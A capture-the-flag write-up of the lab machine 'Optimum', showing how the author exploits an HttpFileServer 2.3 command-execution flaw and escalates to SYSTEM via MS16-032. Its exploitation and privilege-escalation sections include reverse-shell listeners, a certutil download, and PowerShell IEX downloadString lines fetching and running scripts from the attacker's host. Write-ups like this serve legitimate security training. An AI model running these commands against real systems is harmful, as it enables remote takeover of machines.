# OPTIMUM | 10.10.10.8

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.8

### Open Ports and Their Services

* 80 - HTTP - HttpFileServer 2.3

### OS Discovery

Windows 2012|2008|7|Vista, according to the nmap scan.

## Service Enumeration

### 80 HTTP

Here we have a very plain looking file server, open to anyone. 

![](img/port-80.png)

Hovering over the link at the bottom (the one that helpfully gives us the version number) shows that this is a "Rejetto" product, so I make a searchsploit query to look for an exploit:

![](img/searchsploit.png)

Now It is time to configure and exploit.

## Exploitation

I choose one of the python-based exploits (the one that said "Remote Command Execution (2)"), and get to work configuring it. I need to add my own IP and port for the reverse shell, as well as having a listener running, _and_ a server running so the exploit can grab the netcat exe.  
I have also copied nc.exe to my working folder from the tools folder.

    python3 http.server 80
    rlwrap nc -nvlp 6969

All that is left is to run the exploit and hope all goes well...

    python rce.py 10.10.10.8 80

I ran the exploit twice (the first time it grabbed my nc.exe, second time executed), and I had a shell, as the user kostas:

![](img/user-shell.png)

## Enumeration

I grabbed the `systeminfo` output for running with Windows Exploit Suggester, and noted that the box is Microsoft Windows Server 2012 R2 Standard, Build 9600, with a few hotfixes.

The user doesn't seem to have any privileges that stand out, and before I look for kernel level exploits, I will throw an enum script on the machine to look for misconfigurations.

Almost forgot to grab the flag:

![](img/user-flag.png)

I have downloaded the winPEAS exe to the machine using this command:

    certutil -urlcache -f "http://10.10.14.36/winPEAS64.exe" wp.exe

WinPEAS was able to pick up some autologon credentials for our user:

![](img/kostas-creds.png)

However, since there are no other services running externally, I am not sure what to do with the creds.

So my next route is to check for kernel exploits, using [Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester).

    ./win-ex-suggester.py -d 2020-09-26-mssb.xls -i sysinfo.txt

Gotta say, there were **a lot** of results, which at first seems awesome, until you realise you have to maybe try them all, and basically all of them will fail.

## Privilege Escalation

Welp, the first candidate is a [non-Metasploit based](https://www.exploit-db.com/exploits/39719) version of MS16-032, this one is Powershell based. I had to grab a modified version from the now-defunct [Powershell Empire](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1) project, because the original just opens a command prompt on the machine, which is useless if you don't have a GUI.

I just cloned the directory and copied the 'Invoke-MS16032.ps1' over to my working dir.

At the bottom, I added the example command, but put in a link to my Powershell reverse shell script:

    Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.36/rev.ps1')" 

Since I was having a hell of a time simply executing and loading powershell in my command shell, I first had to 'upgrade' to Powershell, so to speak, by downloading and executing the reverse shell once, then changing the script to add a different port number on my machine:

    > C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.36/rev.ps1') 
    # rlwrap nc -nvlp 8001

Once I had a powershell session it became a little easier to comprehend what commands I had to type.

So, from the victim machine (in Powershell), I executed the download of the exploit. It executed, which in turn executes the downloadString function as SYSTEM; that function downloads another reverse shell, and then I have a SYSTEM shell.

    > IEX(New-Object Net.WebClient).downloadString('http://10.10.14.36/Invoke-MS16032.ps1')

(Also, I had a netcat listener running, as well as my python server to deliver both scripts).

![](img/root-shell.png)

Success!

I should mention that this failed over and over (and over) until I noticed that the example command in the Invoke script had an extra '-' that should not be there!

So, here is the flag:

![](img/root-flag.png)

## Conclusion

What an annoying box! Mostly due to my ignorance of Powershell, and not noticing that extra hyphen which vexed me for longer than I will admit. Once again, it means PAY ATTENTION.

Steps taken:

* Exploit a remote command execution vuln in HFS to gain a user shell
* Enumerate until I find a usable kernel exploit, in this case MS16-032
* Upgrade my regular shell to a powershell session so the exploit works properly (not sure if necessary)
* Download and execute the exploit which downloads and executes a reverse shell as SYSTEM



